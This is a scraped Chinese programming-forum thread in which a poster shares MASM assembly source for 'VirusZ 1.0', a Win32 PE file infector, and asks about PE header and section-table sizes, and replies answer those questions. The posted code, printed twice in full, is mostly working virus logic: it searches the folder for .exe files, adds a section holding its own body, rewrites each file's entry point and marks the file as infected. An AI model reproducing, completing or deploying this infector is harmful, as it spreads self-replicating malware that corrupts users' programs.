21,499
社区成员
发帖
与我相关
我的任务
分享小弟代码中有3处不懂,请高手指点(pe文件相关)
红色部分是问题所在
小弟基础不好,可能问题比较傻,高手别笑话,先谢谢了
---------------------------------------------------
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\gdi32.lib
.data ;
MsgTitle db "Caution!", 0h
Msg db "VirusZ OK!", 0h
.code
main_start:
push MB_OK
push offset MsgTitle
push offset Msg
push NULL
call MessageBox
push 0h
call ExitProcess
VirusZ segment
virus_start:
call get_offset
get_offset:
pop ebp
sub ebp, offset get_offset
cmp Ori_Entry[ebp], 0h
jnz save_entry
mov Ori_Entry[ebp], 401000h
save_entry:
push Ori_Entry[ebp]
pop Ret_Entry[ebp]
lea eax, FindData[ebp]
push eax
lea eax, FindFile[ebp]
push eax
call ZFindFirstFile ;
cmp eax, INVALID_HANDLE_VALUE
jz end_find ;
mov FindHandle[ebp], eax
call infect_file ;
find_next:
lea eax, FindData[ebp]
push eax
push FindHandle[ebp]
call ZFindNextFile ;
cmp eax, FALSE
jz end_find ;
call infect_file ;
jmp find_next
infect_file:
push 0h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0h
push FILE_SHARE_READ + FILE_SHARE_WRITE
push GENERIC_READ + GENERIC_WRITE
lea eax, FindData[ebp].cFileName
push eax
call ZCreateFile ;
cmp eax, INVALID_HANDLE_VALUE
jz create_err
mov OpenHandle[ebp], eax
push FILE_BEGIN
push 0h
push 3ch
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h
lea eax, ReadCount[ebp]
push eax
push 4h
lea eax, PEAddress[ebp]
push eax
push OpenHandle[ebp]
call ZReadFile ;
cmp eax, 0h
jz read_err
push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ;
mov HeadLength[ebp], sizeof PEHead + sizeof SectionTable ; 问题1 此处PEHead
的大小是固定的么?如果不是固定的此处得到的大小,一定和当前感染的文件的PEHead 的
大小吻合么?
问题2 SectionTable被定义为280h,是为什么?难道节表的大小也是固定的?
push 0h
lea eax, ReadCount[ebp]
push eax
push HeadLength[ebp]
lea eax, PEHead[ebp] ①
push eax
push OpenHandle[ebp]
call ZReadFile ;
cmp eax, 0h
jz read_err
cmp DWORD ptr PEHead[ebp].Signature, IMAGE_NT_SIGNATURE ;
jnz end_modify
cmp WORD ptr PEHead[ebp + 1ah], 0C05h ;
jz end_modify
mov eax, PEHead[ebp].OptionalHeader.AddressOfEntryPoint
add eax, PEHead[ebp].OptionalHeader.ImageBase
mov Ori_Entry[ebp], eax ;
mov eax, sizeof PEHead ; 问题3,这个地方这么理解可以么?因为在 ① 处已经赋值
过了,所以其大小是真实文件中PEHead 的大小
mov SectionAddress[ebp], eax ;
mov VirusLength[ebp], offset virus_end - offset virus_start ;
movzx eax, PEHead[ebp].FileHeader.NumberOfSections ;
inc eax
mov ecx, 28h
mul ecx ; eax = eax * ecx
add eax, SectionAddress[ebp]
add eax, PEAddress[ebp]
cmp eax, PEHead[ebp].OptionalHeader.SizeOfHeaders ;
ja end_modify
lea edi, SectionTable[ebp]
movzx eax, PEHead[ebp].FileHeader.NumberOfSections
mov ecx, 28h
mul ecx
add edi, eax
inc PEHead[ebp].FileHeader.NumberOfSections ;
mov eax, [edi - 28h + 8h] ;
add eax, [edi - 28h + 0ch] ;
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].VirtualAddress, eax ;
mov eax, VirusLength[ebp] ;
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawSize, eax ;
mov eax, VirusLength[ebp] ;
mov NewSection[ebp].VirtualSize, eax ;
mov eax, [edi - 28h + 14h] ;
add eax, [edi - 28h + 10h] ;
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawOffset, eax ;
mov eax, NewSection[ebp].VirtualSize ;
add eax, PEHead[ebp].OptionalHeader.SizeOfImage ;
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ;
div ecx
inc eax
mul ecx
mov PEHead[ebp].OptionalHeader.SizeOfImage, eax ;
lea esi, NewSection[ebp]
mov ecx, 28h
rep movsb ;
mov eax, NewSection[ebp].VirtualAddress
mov PEHead[ebp].OptionalHeader.AddressOfEntryPoint, eax ;
mov WORD ptr PEHead[ebp + 1ah], 0C05h ;
push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h
lea eax, ReadCount[ebp]
push eax
push HeadLength[ebp]
lea eax, PEHead[ebp]
push eax
push OpenHandle[ebp]
call ZWriteFile ;
cmp eax, 0h
jz write_err
push FILE_BEGIN
push 0h
push NewSection[ebp].RawOffset
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h
lea eax, ReadCount[ebp]
push eax
push NewSection[ebp].RawSize
lea eax, virus_start[ebp]
push eax
push OpenHandle[ebp]
call ZWriteFile ;
cmp eax, 0h
jz write_err
end_modify:
read_err:
write_err:
setpointer_err:
push OpenHandle[ebp]
call ZCloseHandle ;
create_err:
ret
end_find:
push FindHandle[ebp]
call ZFindClose ;
push Ret_Entry[ebp] ;
ret
ZCreateFile:
mov FunctionAddress[ebp], 77e5a837h
jmp FunctionAddress[ebp]
.....
......
ZFindClose:
mov FunctionAddress[ebp], 77e58eaah
jmp FunctionAddress[ebp]
;========================================== <
Ret_Entry dd 0h
Ori_Entry dd 0h
FindFile db "*.exe", 0h
FindData WIN32_FIND_DATA <0>
FindHandle dd 0h
OpenHandle dd 0h
ReadCount dd 0h
PEAddress dd 0h
PEHead IMAGE_NT_HEADERS <0>
SectionTable db 280h dup (0)
HeadLength dd 0h
SectionAddress dd 0h
VirusLength dd 0h
FunctionAddress dd 0h
VirusZSection struc
SectionName db "VirusZ", 0h, 0h
VirtualSize dd 0h
VirtualAddress dd 0h
RawSize dd 0h
RawOffset dd 0h
dd 0h, 0h, 0h
SectionFlags dd 0e0000020h
VirusZSection ends
NewSection VirusZSection <>
VirusName db 0h, "VirusZ 1.0 by Zane", 0h ;
virus_end:
VirusZ ends
end virus_start ;
小弟基础不好,可能问题比较傻,高手别笑话,先谢谢了
---------------------------------------------------
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\gdi32.lib
.data ;
MsgTitle db "Caution!", 0h
Msg db "VirusZ OK!", 0h
.code
main_start:
push MB_OK
push offset MsgTitle
push offset Msg
push NULL
call MessageBox
push 0h
call ExitProcess
VirusZ segment
virus_start:
call get_offset
get_offset:
pop ebp
sub ebp, offset get_offset
cmp Ori_Entry[ebp], 0h
jnz save_entry
mov Ori_Entry[ebp], 401000h
save_entry:
push Ori_Entry[ebp]
pop Ret_Entry[ebp]
lea eax, FindData[ebp]
push eax
lea eax, FindFile[ebp]
push eax
call ZFindFirstFile ;
cmp eax, INVALID_HANDLE_VALUE
jz end_find ;
mov FindHandle[ebp], eax
call infect_file ;
find_next:
lea eax, FindData[ebp]
push eax
push FindHandle[ebp]
call ZFindNextFile ;
cmp eax, FALSE
jz end_find ;
call infect_file ;
jmp find_next
infect_file:
push 0h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0h
push FILE_SHARE_READ + FILE_SHARE_WRITE
push GENERIC_READ + GENERIC_WRITE
lea eax, FindData[ebp].cFileName
push eax
call ZCreateFile ;
cmp eax, INVALID_HANDLE_VALUE
jz create_err
mov OpenHandle[ebp], eax
push FILE_BEGIN
push 0h
push 3ch
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h
lea eax, ReadCount[ebp]
push eax
push 4h
lea eax, PEAddress[ebp]
push eax
push OpenHandle[ebp]
call ZReadFile ;
cmp eax, 0h
jz read_err
push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ;
mov HeadLength[ebp], sizeof PEHead + sizeof SectionTable ; 问题1 此处PEHead
的大小是固定的么?如果不是固定的此处得到的大小,一定和当前感染的文件的PEHead 的
大小吻合么?
问题2 SectionTable被定义为280h,是为什么?难道节表的大小也是固定的?
push 0h
lea eax, ReadCount[ebp]
push eax
push HeadLength[ebp]
lea eax, PEHead[ebp] ①
push eax
push OpenHandle[ebp]
call ZReadFile ;
cmp eax, 0h
jz read_err
cmp DWORD ptr PEHead[ebp].Signature, IMAGE_NT_SIGNATURE ;
jnz end_modify
cmp WORD ptr PEHead[ebp + 1ah], 0C05h ;
jz end_modify
mov eax, PEHead[ebp].OptionalHeader.AddressOfEntryPoint
add eax, PEHead[ebp].OptionalHeader.ImageBase
mov Ori_Entry[ebp], eax ;
mov eax, sizeof PEHead ; 问题3,这个地方这么理解可以么?因为在 ① 处已经赋值
过了,所以其大小是真实文件中PEHead 的大小
mov SectionAddress[ebp], eax ;
mov VirusLength[ebp], offset virus_end - offset virus_start ;
movzx eax, PEHead[ebp].FileHeader.NumberOfSections ;
inc eax
mov ecx, 28h
mul ecx ; eax = eax * ecx
add eax, SectionAddress[ebp]
add eax, PEAddress[ebp]
cmp eax, PEHead[ebp].OptionalHeader.SizeOfHeaders ;
ja end_modify
lea edi, SectionTable[ebp]
movzx eax, PEHead[ebp].FileHeader.NumberOfSections
mov ecx, 28h
mul ecx
add edi, eax
inc PEHead[ebp].FileHeader.NumberOfSections ;
mov eax, [edi - 28h + 8h] ;
add eax, [edi - 28h + 0ch] ;
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].VirtualAddress, eax ;
mov eax, VirusLength[ebp] ;
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawSize, eax ;
mov eax, VirusLength[ebp] ;
mov NewSection[ebp].VirtualSize, eax ;
mov eax, [edi - 28h + 14h] ;
add eax, [edi - 28h + 10h] ;
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawOffset, eax ;
mov eax, NewSection[ebp].VirtualSize ;
add eax, PEHead[ebp].OptionalHeader.SizeOfImage ;
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ;
div ecx
inc eax
mul ecx
mov PEHead[ebp].OptionalHeader.SizeOfImage, eax ;
lea esi, NewSection[ebp]
mov ecx, 28h
rep movsb ;
mov eax, NewSection[ebp].VirtualAddress
mov PEHead[ebp].OptionalHeader.AddressOfEntryPoint, eax ;
mov WORD ptr PEHead[ebp + 1ah], 0C05h ;
push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h
lea eax, ReadCount[ebp]
push eax
push HeadLength[ebp]
lea eax, PEHead[ebp]
push eax
push OpenHandle[ebp]
call ZWriteFile ;
cmp eax, 0h
jz write_err
push FILE_BEGIN
push 0h
push NewSection[ebp].RawOffset
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h
lea eax, ReadCount[ebp]
push eax
push NewSection[ebp].RawSize
lea eax, virus_start[ebp]
push eax
push OpenHandle[ebp]
call ZWriteFile ;
cmp eax, 0h
jz write_err
end_modify:
read_err:
write_err:
setpointer_err:
push OpenHandle[ebp]
call ZCloseHandle ;
create_err:
ret
end_find:
push FindHandle[ebp]
call ZFindClose ;
push Ret_Entry[ebp] ;
ret
ZCreateFile:
mov FunctionAddress[ebp], 77e5a837h
jmp FunctionAddress[ebp]
.....
......
ZFindClose:
mov FunctionAddress[ebp], 77e58eaah
jmp FunctionAddress[ebp]
;========================================== <
Ret_Entry dd 0h
Ori_Entry dd 0h
FindFile db "*.exe", 0h
FindData WIN32_FIND_DATA <0>
FindHandle dd 0h
OpenHandle dd 0h
ReadCount dd 0h
PEAddress dd 0h
PEHead IMAGE_NT_HEADERS <0>
SectionTable db 280h dup (0)
HeadLength dd 0h
SectionAddress dd 0h
VirusLength dd 0h
FunctionAddress dd 0h
VirusZSection struc
SectionName db "VirusZ", 0h, 0h
VirtualSize dd 0h
VirtualAddress dd 0h
RawSize dd 0h
RawOffset dd 0h
dd 0h, 0h, 0h
SectionFlags dd 0e0000020h
VirusZSection ends
NewSection VirusZSection <>
VirusName db 0h, "VirusZ 1.0 by Zane", 0h ;
virus_end:
VirusZ ends
end virus_start ;
...全文
请发表友善的回复…
发表回复
killbug2004 2009-10-27
- 打赏
- 举报
sizeof返回变量或类型的大小,所占字节数。
所以
mov eax, sizeof PEHead 和 mov eax, sizeof IMAGE_NT_HEADERS是一样的
将结构体IMAGE_NT_HEADERS的大小传给eax (mov eax,0F8h)
mov HeadLength[ebp], sizeof PEHead + sizeof SectionTable 这里也是一样的
mov HeadLength[ebp], sizeof IMAGE_NT_HEADERS + sizeof SectionTable
即mov HeadLength[ebp], 0Fh + 280h
都是固定不变的,因为变量类型是编译时固定的
PEHead IMAGE_NT_HEADERS <0> ;PE头
SectionTable db 280h dup (0) ;节表
这里是定义一个缓冲区,280h是固定的,代码中默认一般的PE文件的节表不会多余10h个,只是将PE文件的头和节表读入这个缓冲区来处理判断
所以
mov eax, sizeof PEHead 和 mov eax, sizeof IMAGE_NT_HEADERS是一样的
将结构体IMAGE_NT_HEADERS的大小传给eax (mov eax,0F8h)
mov HeadLength[ebp], sizeof PEHead + sizeof SectionTable 这里也是一样的
mov HeadLength[ebp], sizeof IMAGE_NT_HEADERS + sizeof SectionTable
即mov HeadLength[ebp], 0Fh + 280h
都是固定不变的,因为变量类型是编译时固定的
PEHead IMAGE_NT_HEADERS <0> ;PE头
SectionTable db 280h dup (0) ;节表
这里是定义一个缓冲区,280h是固定的,代码中默认一般的PE文件的节表不会多余10h个,只是将PE文件的头和节表读入这个缓冲区来处理判断
etracer 2009-10-27
- 打赏
- 举报
如题,3个问题没得到答案,为求答案顶
etracer 2009-10-27
- 打赏
- 举报
太感谢了,谢谢你,给分了
etracer 2009-10-25
- 打赏
- 举报
楼上,不要貌似,小弟想要准确的答案
如题,3个问题没得到答案
如题,3个问题没得到答案
friendly_ 2009-10-25
- 打赏
- 举报
PEHead 是IMAGE_NT_HEADERS的结构体变量其size是固定的
SectionTable 貌似是新写入的section的大小.
SectionTable 貌似是新写入的section的大小.
zhj408135897 2009-10-25
- 打赏
- 举报
这么长?没看一半我就晕掉了~~还是帮顶吧~~嘿嘿~~
